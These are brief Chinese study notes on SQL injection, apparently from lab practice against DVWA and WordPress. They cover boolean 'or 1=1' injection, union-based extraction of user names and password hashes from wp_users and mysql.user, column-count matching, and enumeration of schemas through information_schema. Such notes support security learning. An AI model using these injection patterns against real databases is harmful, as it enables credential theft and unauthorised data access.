1. bool查询 or 1=1 只能查到这张表的记录
2.union查询 可以查到其他表的数据()
mysql> select user,password,host from mysql.user union select user_login,user_pass,3 from wordpress.wp_users;
a.得知道前面查的表的字段数,前后的字段数目得一样,可以用union select 1,2,3; 试出来
b.得知道后面的表的字段的名称 和前面的表个数一样 可以用数字凑够个数
select * from dvwa.users where 1=2 union select user_login,user_pass1,1,2,3,4 from wordpress.wp_users; 不想显示前面的表的数据,可以where 1=2
information_schema库(两个表TABLES和columns)
查库名
mysql> select DISTINCT TABLE_SCHEMA from information_schema.TABLES; //等价于show databases
查表名
mysql> select TABLE_NAME from INFORMATION_SCHEMA.tables where TABLE_SCHEMA='dvwa'; //等价于show tables
查字段名
mysql> select column_name from INFORMATION_SCHEMA.columns where table_schema='dvwa' and table_name='users';